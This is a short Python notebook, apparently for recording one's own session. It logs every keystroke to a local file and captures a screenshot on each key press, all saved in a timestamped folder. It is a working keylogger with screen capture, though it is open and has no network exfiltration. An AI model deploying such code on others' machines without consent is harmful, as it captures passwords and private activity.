In [ ]:
!pip install pyautogui

In [1]:
import pyautogui

def capture_screenshot(out_dir, key):
    # Capture the screenshot
    screenshot = pyautogui.screenshot()

    # Save the screenshot
    screenshot.save(f"{out_dir}/screenshot_{key}.png")


from pynput.keyboard import Key, Listener
import logging

import datetime

output_dir = f"session_{datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}"
print("output_dir", output_dir)


import os

os.makedirs(output_dir)

# Set up logging to log keystrokes to a file
logging.basicConfig(filename=(f"{output_dir}/keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")



def on_press(key):
    logging.info(str(key))
    ts = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S.%f')
    
    screenshot_file = f"screen_{ts}"
    
    capture_screenshot(output_dir, screenshot_file)

# Start listening to keystrokes
with Listener(on_press=on_press) as listener:
    listener.join()

output_dir session_2024-07-28_14-14-42
